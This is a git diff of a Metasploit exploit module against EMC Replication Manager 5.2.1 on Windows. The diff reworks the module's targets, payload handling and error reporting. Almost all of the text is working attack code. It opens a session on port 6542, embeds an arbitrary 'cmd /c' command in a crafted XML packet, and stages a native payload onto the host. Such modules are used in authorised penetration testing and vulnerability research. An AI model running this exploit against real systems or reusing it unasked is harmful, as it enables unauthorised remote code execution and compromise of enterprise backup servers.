diff --git a/modules/exploits/windows/emc/replication_manager_exec.rb b/modules/exploits/windows/emc/replication_manager_exec.rb
index 1e956d9ec4a6..832de8b66c8f 100644
--- a/modules/exploits/windows/emc/replication_manager_exec.rb
+++ b/modules/exploits/windows/emc/replication_manager_exec.rb
@@ -36,84 +36,107 @@ def initialize(info = {})
[ 'OSVDB', '70853' ],
[ 'BID', '46235' ],
[ 'URL', 'http://www.securityfocus.com/archive/1/516260' ],
- [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-061/' ],
+ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-061/' ]
],
'DisclosureDate' => 'Feb 07 2011',
'Platform' => 'win',
- 'Arch' => [ ARCH_X86 ],
+ 'Arch' => [ ARCH_X86, ARCH_CMD ],
+ 'Payload' =>
+ {
+ 'Space' => 5000,
+ 'DisableNops' => true
+ },
'Targets' =>
[
- [ 'Automatic', { } ]
+ # Tested on Windows XP and Windows 2003
+ [ 'EMC Replication Manager 5.2.1 / Windows Native Payload',
+ {
+ 'Arch' => ARCH_X86
+ }
+ ],
+ [ 'EMC Replication Manager 5.2.1 / Windows CMD',
+ {
+ 'Arch' => ARCH_CMD
+ }
+ ]
],
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 5
+ },
'DefaultTarget' => 0,
'Privileged' => true,
))
register_options(
[
- Opt::RPORT(6542),
- OptString.new('CMD', [ false, 'Execute this command instead of using command stager']),
+ Opt::RPORT(6542)
], self.class)
end
def exploit
- if datastore['CMD']
- print_status("Executing command '#{datastore['CMD']}'")
- execute_command(datastore['CMD'], {})
- return
- end
+ if target.name =~ /CMD/
+ print_status("Executing payload...")
+ print_status("#{payload.encoded}")
+ execute_command(payload.encoded, {})
+ else # Native target
+ execute_cmdstager({:linemax => 5000, :nodelete => true})
+ end
- execute_cmdstager({:linemax => 5000})
- handler
end
def execute_command(cmd, opts)
connect
hello = "1HELLOEMC00000000000000000000000"
+ vprint_status("Sending hello...")
sock.put(hello)
result = sock.get_once || ''
if result =~ /RAWHELLO/
- print_good("We sent hello and get hello back from the server. Good")
- else
- disconnect
- return
+ vprint_good("Expected hello response")
+ else
+ disconnect
+ fail_with(Failure::Unknown ,"Failed to hello the server")
end
- startsession = "EMC_Len00000001361"
- sock.put(startsession)
+ start_session = "EMC_Len00000001361"
+ vprint_status("Starting session...")
+ sock.put(start_session)
result = sock.get_once || ''
if result =~ /EMC/
- print_good("A session has been created. Good.")
- else
- disconnect
- return
+ vprint_good("A session has been created. Good.")
+ else
+ disconnect
+ fail_with(Failure::Unknown, "Failed to create the session")
end
- runprog = " "
- runprog << "cmd /c #{cmd}"
- runprog << "<?xml version="1.0" encoding="UTF-8"?> <ir_message ir_sessionId="00000" ir_requestId="00000" "
- runprog << "ir_type="App Info" ir_status="0"><IR_groupEntry IR_groupType="anywriter" IR_groupName="CM1109A1" IR_groupId="1" "
- runprog << "><?xml version="1.0" encoding="UTF-8"? > <ir_message ir_sessionId="00000" "
- runprog << "ir_requestId="00000"ir_type="App Info" ir_status="0"><aa_anywriter_ccr_node>CM1109A1"
- runprog << "</aa_anywriter_ccr_node><aa_anywriter_fail_1018>0</aa_anywriter_fail_1018><aa_anywriter_fail_1019>0"
- runprog << "</aa_anywriter_fail_1019><aa_anywriter_fail_1022>0</aa_anywriter_fail_1022><aa_anywriter_runeseutil>1"
- runprog << "</aa_anywriter_runeseutil><aa_anywriter_ccr_role>2</aa_anywriter_ccr_role><aa_anywriter_prescript>"
- runprog << "</aa_anywriter_prescript><aa_anywriter_postscript></aa_anywriter_postscript><aa_anywriter_backuptype>1"
- runprog << "</aa_anywriter_backuptype><aa_anywriter_fail_447>0</aa_anywriter_fail_447><aa_anywriter_fail_448>0"
- runprog << "</aa_anywriter_fail_448><aa_exchange_ignore_all>0</aa_exchange_ignore_all><aa_anywriter_sthread_eseutil>0&"
- runprog << ";lt;/aa_anywriter_sthread_eseutil><aa_anywriter_required_logs>0</aa_anywriter_required_logs><aa_anywriter_required_logs_path"
- runprog << "></aa_anywriter_required_logs_path><aa_anywriter_throttle>1</aa_anywriter_throttle><aa_anywriter_throttle_ios>300"
- runprog << "</aa_anywriter_throttle_ios><aa_anywriter_throttle_dur>1000</aa_anywriter_throttle_dur><aa_backup_username>"
- runprog << "</aa_backup_username><aa_backup_password></aa_backup_password><aa_exchange_checksince>1335208339"
- runprog << "</aa_exchange_checksince> </ir_message></IR_groupEntry> </ir_message>"
- runprog << "anywriterbackup "
- emc6 = "EMC_Len000000";
- runpacket = emc6 + runprog.length.to_s + runprog
- sock.put(runpacket)
+ run_prog = " "
+ run_prog << "cmd /c #{cmd}"
+ run_prog << "<?xml version="1.0" encoding="UTF-8"?> <ir_message ir_sessionId="00000" ir_requestId="00000" "
+ run_prog << "ir_type="App Info" ir_status="0"><IR_groupEntry IR_groupType="anywriter" IR_groupName="CM1109A1" IR_groupId="1" "
+ run_prog << "><?xml version="1.0" encoding="UTF-8"? > <ir_message ir_sessionId="00000" "
+ run_prog << "ir_requestId="00000"ir_type="App Info" ir_status="0"><aa_anywriter_ccr_node>CM1109A1"
+ run_prog << "</aa_anywriter_ccr_node><aa_anywriter_fail_1018>0</aa_anywriter_fail_1018><aa_anywriter_fail_1019>0"
+ run_prog << "</aa_anywriter_fail_1019><aa_anywriter_fail_1022>0</aa_anywriter_fail_1022><aa_anywriter_runeseutil>1"
+ run_prog << "</aa_anywriter_runeseutil><aa_anywriter_ccr_role>2</aa_anywriter_ccr_role><aa_anywriter_prescript>"
+ run_prog << "</aa_anywriter_prescript><aa_anywriter_postscript></aa_anywriter_postscript><aa_anywriter_backuptype>1"
+ run_prog << "</aa_anywriter_backuptype><aa_anywriter_fail_447>0</aa_anywriter_fail_447><aa_anywriter_fail_448>0"
+ run_prog << "</aa_anywriter_fail_448><aa_exchange_ignore_all>0</aa_exchange_ignore_all><aa_anywriter_sthread_eseutil>0&"
+ run_prog << ";lt;/aa_anywriter_sthread_eseutil><aa_anywriter_required_logs>0</aa_anywriter_required_logs><aa_anywriter_required_logs_path"
+ run_prog << "></aa_anywriter_required_logs_path><aa_anywriter_throttle>1</aa_anywriter_throttle><aa_anywriter_throttle_ios>300"
+ run_prog << "</aa_anywriter_throttle_ios><aa_anywriter_throttle_dur>1000</aa_anywriter_throttle_dur><aa_backup_username>"
+ run_prog << "</aa_backup_username><aa_backup_password></aa_backup_password><aa_exchange_checksince>1335208339"
+ run_prog << "</aa_exchange_checksince> </ir_message></IR_groupEntry> </ir_message>"
+ run_prog << "anywriterbackup "
+ run_prog_header = "EMC_Len000000"
+ run_prog_packet = run_prog_header + run_prog.length.to_s + run_prog
+
+ vprint_status("Executing command....")
+ sock.put(run_prog_packet)
Rex.sleep(1) # wait for irccd.exe to write the stager on disk
- endstring = Rex::Text.rand_text_alpha(rand(10)+32)
- sock.put(endstring)
+
+ end_string = Rex::Text.rand_text_alpha(rand(10)+32)
+ sock.put(end_string)
disconnect
end